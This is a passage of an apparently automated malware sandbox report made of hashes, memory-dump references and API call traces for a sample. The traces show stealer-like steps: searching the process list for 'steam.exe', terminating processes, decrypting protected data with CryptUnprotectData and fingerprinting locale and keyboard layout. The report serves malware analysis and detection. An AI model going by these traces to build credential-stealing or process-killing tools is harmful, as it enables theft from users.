                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 29f1747a0aeb511bce0e6638d0f20a21b94ea7081031839af1fc863162c12641
                          • Instruction ID: 5e68ad8adc9436f116080fedb747315bd95b27c2a98f4fca25dd60b753858c95
                          • Opcode Fuzzy Hash: 29f1747a0aeb511bce0e6638d0f20a21b94ea7081031839af1fc863162c12641
                          • Instruction Fuzzy Hash: C1411C72625655CBCB22AF6CDD8DA9E77E4AF14300F049224BC5AA7193CF78DC468B90
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007246B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 007246C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007246DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 007246ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00724702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00724711
                          • CloseHandle.KERNEL32(00000000), ref: 00724718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00724726
                          • CloseHandle.KERNEL32(00000000), ref: 00724731
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 5f1d849d7a37e6631adbb7ee4f3aee15037f6eb414797b7157b40fd3416e02c7
                          • Instruction ID: 60d0e14127ef6fad3d62a24d34504a69cdcefb2c3ebf11413db59666f64fd9f3
                          • Opcode Fuzzy Hash: 5f1d849d7a37e6631adbb7ee4f3aee15037f6eb414797b7157b40fd3416e02c7
                          • Instruction Fuzzy Hash: 7801F9316152246BE7205B60EC8CFFF377CEB45B01F000088F905D2180EFB499409FA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %C_$){]o$){]o$3;$>}_$I,o$d6/$iKx#$m{
                          • API String ID: 0-2305312169
                          • Opcode ID: 065c0bb1f2d4c90ad71b126cdeac3bae054c41fe4f742fd3e92110acef196313
                          • Instruction ID: 93b570bca4b7dd5fe2bc85ec05f8d43e76f09e0114c8080cc3bf5d086cd613c4
                          • Opcode Fuzzy Hash: 065c0bb1f2d4c90ad71b126cdeac3bae054c41fe4f742fd3e92110acef196313
                          • Instruction Fuzzy Hash: C9B218F3A0C2009FE3046E2DEC8567ABBE5EF94720F1A493DE6C4C7744EA3598458697
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00724628
                          • Process32First.KERNEL32(00000000,00000128), ref: 00724638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0072464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00724660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00724672
                          • CloseHandle.KERNEL32(00000000), ref: 0072467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: db368331a64c1d45f3f3830ad5324ad08fc411d4f1e145ca415cfa43a1510a4c
                          • Instruction ID: 1fbd045c27c1d249a8000e0ab878e9a1c272a515cf6eff0cd2268bfc679f36ab
                          • Opcode Fuzzy Hash: db368331a64c1d45f3f3830ad5324ad08fc411d4f1e145ca415cfa43a1510a4c
                          • Instruction Fuzzy Hash: FB0162716152249BE7209B60AC89FEB77BCEF09750F0401D5F908D1040EFB899949FE5
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00714B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714B7F
                          • lstrlen.KERNEL32(00734CA8), ref: 00714B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714BA7
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 00714BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00714BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: a04763af84a1ee2b2374d11f3eb6fab13f7322f6927abf8f39ad8721b78ecfaa
                          • Instruction ID: 6eb6e127f2f18a2eaf22e58d46b66e99ecbf72ee22cf569bc4f439f2de74e5b2
                          • Opcode Fuzzy Hash: a04763af84a1ee2b2374d11f3eb6fab13f7322f6927abf8f39ad8721b78ecfaa
                          • Instruction Fuzzy Hash: B731FDB2629515DBC732EF6CED8DB9E77F5AF50700F005224B805A7292CB78EC468B90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;f$;f$@;$Aow/$e}$s!~$S}$y?
                          • API String ID: 0-3189201537
                          • Opcode ID: 9e0dd72a16a71ebfed79bb343aec5ab3ce1e0ad6848f20ae7fa88d55030dfb28
                          • Instruction ID: a94c0cadafafafdc5fb71e0c584cdf48fed10192b620f63deeec17d48dcb409b
                          • Opcode Fuzzy Hash: 9e0dd72a16a71ebfed79bb343aec5ab3ce1e0ad6848f20ae7fa88d55030dfb28
                          • Instruction Fuzzy Hash: 97B227F3A0C2009FE304AF29EC8567ABBE9EF94320F16493DEAC5C7744E63558458697
                          APIs
                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00722D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00722DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00722DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00722DEC
                          • LocalFree.KERNEL32(00000000), ref: 00722FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: bc0e412b7dccd33f9ebc4157dee962da64eee3e01f55eba983b746501305c313
                          • Instruction ID: e9cbb1fec259b01401f1ca0659c88dc096a686a1a39f3dd78ef2dfa8871c744d
                          • Opcode Fuzzy Hash: bc0e412b7dccd33f9ebc4157dee962da64eee3e01f55eba983b746501305c313
                          • Instruction Fuzzy Hash: D8B13A70904224DFC714CF58D988B99B7F1FB44324F2AC1A9D409AB2A2D77ADD82DF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: w^$AW+$I!}$oX};$7w}$iC^$iC^
                          • API String ID: 0-575452492
                          • Opcode ID: 6f157ea328204272279c26c21d1f43405f399aa92030b4cdf75a2c48cec40abe
                          • Instruction ID: 6cb2b55797974a45f8de61f1e2d9f9ca4b5c8d3f75ea5b03348487a1a1ca5ca5
                          • Opcode Fuzzy Hash: 6f157ea328204272279c26c21d1f43405f399aa92030b4cdf75a2c48cec40abe
                          • Instruction Fuzzy Hash: A7B2C4F36082049FD3046E2DEC8567AFBE9EF94720F1A893DEAC4C3744E63598458697
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00722C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00722C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 00722C58
                          • wsprintfA.USER32 ref: 00722C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: b65988c978f4db483642dfc093c129e7a4f108cec8271c3919904b22d1854a54
                          • Instruction ID: b117a25a76ef81b7ee93c667d9a5ff835cc9cba91d2820d1a1ca764a15f37045
                          • Opcode Fuzzy Hash: b65988c978f4db483642dfc093c129e7a4f108cec8271c3919904b22d1854a54
                          • Instruction Fuzzy Hash: E6012BB1A08614BBD71C8F58DC4AF6EB76DEB84721F004329F916D73C0D7B419008AE1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: S,$&6n$1p]_$i_+$nT}
                          • API String ID: 0-1527508719
                          • Opcode ID: 103967cf9986499eeedfeea5169c3ca4fc170ca5e02c18b0e5facc93a27a3856
                          • Instruction ID: 872aa2d9a7eb5c0a2c3913019574af5371948a6fb1ce8e1e43f3c88173595737
                          • Opcode Fuzzy Hash: 103967cf9986499eeedfeea5169c3ca4fc170ca5e02c18b0e5facc93a27a3856
                          • Instruction Fuzzy Hash: 33B2F5F3A0C2009FD704AE2DEC8567ABBE9EF94720F16893DEAC5C3744E63558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0F`!$8J:^$8J:^$=p{$AePu
                          • API String ID: 0-1857693422
                          • Opcode ID: 1de96879eb41546d5bbbb5d9ec87006d11674d85b92f50f7aa082b846812b877
                          • Instruction ID: 201ea51f66ee51bf1edc9e3659aefd71dc998759f7ffcda6323adebaee347307
                          • Opcode Fuzzy Hash: 1de96879eb41546d5bbbb5d9ec87006d11674d85b92f50f7aa082b846812b877
                          • Instruction Fuzzy Hash: D4B2F7F360C2009FE3046E29EC8567AFBE9EFD4720F16893DEAC487744EA3558458697
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0070775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00707765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0070778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007077AD
                          • LocalFree.KERNEL32(?), ref: 007077B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: e2053eb4cc0a1e7000b262d3710638e61632e694a4a472af3593d09eb9c86e18
                          • Instruction ID: e4eaa7c1291489dd269cc93376281a446fc2a06eb0b4c881b17e07ad1c9ac5f8
                          • Opcode Fuzzy Hash: e2053eb4cc0a1e7000b262d3710638e61632e694a4a472af3593d09eb9c86e18
                          • Instruction Fuzzy Hash: 39011E75B54318BBEB14DB949C4AFAA7B78EB44B11F104155FA09EA2C0D6B0A900CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: F r$Fm?$G7{$RGu
                          • API String ID: 0-4260231220
                          • Opcode ID: 77de35790c917a96296f3414881d902e7a6ce72fd94b2ae71fb6fc9661e187ab
                          • Instruction ID: aca61107ae45aa0b65272c71e0bf059b98ce059e1a5fd7b8e5d8c01d6f5d40a7
                          • Opcode Fuzzy Hash: 77de35790c917a96296f3414881d902e7a6ce72fd94b2ae71fb6fc9661e187ab
                          • Instruction Fuzzy Hash: 78B23BF3A0C2149FE3046E2DEC8567AFBE9EF94720F1A4A3DEAC4C3744E57558058692
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !1/7$2gO>$:q+O$_Fz
                          • API String ID: 0-2975419313
                          • Opcode ID: 9e0a00b3494b63cd8b13afb4bcc701142a2429e6af46c1392a9fbc9641f4827a
                          • Instruction ID: 72fccdd15c729190257cebc080058b4698f0c39d7d1a86bf9c5f66f5c87447eb
                          • Opcode Fuzzy Hash: 9e0a00b3494b63cd8b13afb4bcc701142a2429e6af46c1392a9fbc9641f4827a
                          • Instruction Fuzzy Hash: B1A2F5F36082009FE704AE2DDC8577ABBE9EF94720F1A493DE6C4C7744EA3598418697
                          APIs
                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00723A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 00723AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00723ABF
                            • Part of subcall function 00727310: lstrlen.KERNEL32(------,00705BEB), ref: 0072731B
                            • Part of subcall function 00727310: lstrcpy.KERNEL32(00000000), ref: 0072733F
                            • Part of subcall function 00727310: lstrcat.KERNEL32(?,------), ref: 00727349
                            • Part of subcall function 00727280: lstrcpy.KERNEL32(00000000), ref: 007272AE
                          • CloseHandle.KERNEL32(00000000), ref: 00723BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 1c614bf1e955150f0f24067328a9a43d302d33188a8791ff99a9367d4b5b4682
                          • Instruction ID: e5480839f45504b60500baaad477414b417d5ddbcce03be42454616cc812c8b3
                          • Opcode Fuzzy Hash: 1c614bf1e955150f0f24067328a9a43d302d33188a8791ff99a9367d4b5b4682
                          • Instruction Fuzzy Hash: 9E810770904224CFD714CF18E988B95B7F1FB44325F29C1A9D409AB2A2D77E9D82DF90
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0070EA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0070EA7E
                          • lstrcat.KERNEL32(0072CFEC,0072CFEC), ref: 0070EB27
                          • lstrcat.KERNEL32(0072CFEC,0072CFEC), ref: 0070EB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: c757dc01f5fbbf7bca1783b9cc4223c995624957dfef6debbd4d83f28d63dad7
                          • Instruction ID: 9f07c6b451e4d7fcde7788b513ea5f142da4ac94735bdaead8dc066fd9336de2
                          • Opcode Fuzzy Hash: c757dc01f5fbbf7bca1783b9cc4223c995624957dfef6debbd4d83f28d63dad7
                          • Instruction Fuzzy Hash: 7A31C4B6A14219ABDB10DB58EC45FEFB77EDF44705F0441A5FA09E2280DBB45A04CFA1
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 007240CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 007240DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007240E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00724113
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: 395cb00d3c9434ebe14b72b9b4ca46a7200d5c7d01d975eb5c814cb4656abedb
                          • Instruction ID: 07b4872c41f7aee6b008ffde4b81d750c33082e52586161d5d366e13f1bf00d5
                          • Opcode Fuzzy Hash: 395cb00d3c9434ebe14b72b9b4ca46a7200d5c7d01d975eb5c814cb4656abedb
                          • Instruction Fuzzy Hash: 69011E70604215ABDB209FA5EC85B6B7BADEF45311F108199BD0987240DA719940DF54
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0072A3D0,000000FF), ref: 00722B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00722B96
                          • GetLocalTime.KERNEL32(?,?,00000000,0072A3D0,000000FF), ref: 00722BA2
                          • wsprintfA.USER32 ref: 00722BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: cfc6781956897d2c943d5d2a59227975dd3fc4fb063ced5d3d649db9d913fcde
                          • Instruction ID: 498fc0f241be93343c8011d8601606482363ffa02b2882ce28577c30562e8bdc
                          • Opcode Fuzzy Hash: cfc6781956897d2c943d5d2a59227975dd3fc4fb063ced5d3d649db9d913fcde
                          • Instruction Fuzzy Hash: 600156B2918524ABC7149BC9DD45FBFB7BCFB4CB11F00011AF645A2280E7B85540D7B1
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00709B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00709B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00709B61
                          • LocalFree.KERNEL32 ref: 00709B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 601629d76147d280ac10a5d44f63cad3a82643e6de1a7b7871ea0290fa8f33c9
                          • Instruction ID: e933f02914a2b8ce978e15ac1f11198fc9e13afc5f1904c7f6a00ddc470293fb
                          • Opcode Fuzzy Hash: 601629d76147d280ac10a5d44f63cad3a82643e6de1a7b7871ea0290fa8f33c9
                          • Instruction Fuzzy Hash: 97F0BDB0358312ABE7305F69AC49F567BA8EF04B61F240514FA45EA2D0D7B4D840DAA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: J$o$O{s$krm
                          • API String ID: 0-2167230457
                          • Opcode ID: f2d454353a07bf8065f6ff06cbb5c18f3f8fe991dc3fa6da1d7c9280e178700c
                          • Instruction ID: 50cea8a8981dfdf2ccc3d210d2aebaad2df02b0ee5f6698c940fe6e2a51474ad
                          • Opcode Fuzzy Hash: f2d454353a07bf8065f6ff06cbb5c18f3f8fe991dc3fa6da1d7c9280e178700c
                          • Instruction Fuzzy Hash: 28B227F3A0C2149FE304AE2DEC8576ABBE9EF94720F1A453DEAC4C3744E53599048697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (>TR$wvz8$zw
                          • API String ID: 0-1238287703
                          • Opcode ID: 97ca21d544cfb1b713bc0a66c299761bbc59a4ff4a66ca7c7cf6a73abd4b3729
                          • Instruction ID: fedf6192fc5bafc532afd747a0813dd0464993e62f505333a70b1e3e2cad26fb
                          • Opcode Fuzzy Hash: 97ca21d544cfb1b713bc0a66c299761bbc59a4ff4a66ca7c7cf6a73abd4b3729
                          • Instruction Fuzzy Hash: 17B204F360C204AFE3046E2DDC8567AFBE9EF94720F1A493DEAC4C3744E63598018696
                          APIs
                          • CoCreateInstance.COMBASE(0072B110,00000000,00000001,0072B100,?), ref: 0071CB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0071CB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 0071CBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: d853b685c31b159ff6887d1644eab4c8a9fffbf94081498898b1ca7b6a37a8e0
                          • Instruction ID: d749da31e737397af6589c9ec039129247eaf1d978d8752d1fe7cef1a2bd8351
                          • Opcode Fuzzy Hash: d853b685c31b159ff6887d1644eab4c8a9fffbf94081498898b1ca7b6a37a8e0
                          • Instruction Fuzzy Hash: A2316671A40628AFD710DB98CC82FEA77B9DB88B10F104184FA04EB2D0D7B4AE44CF90
                          APIs
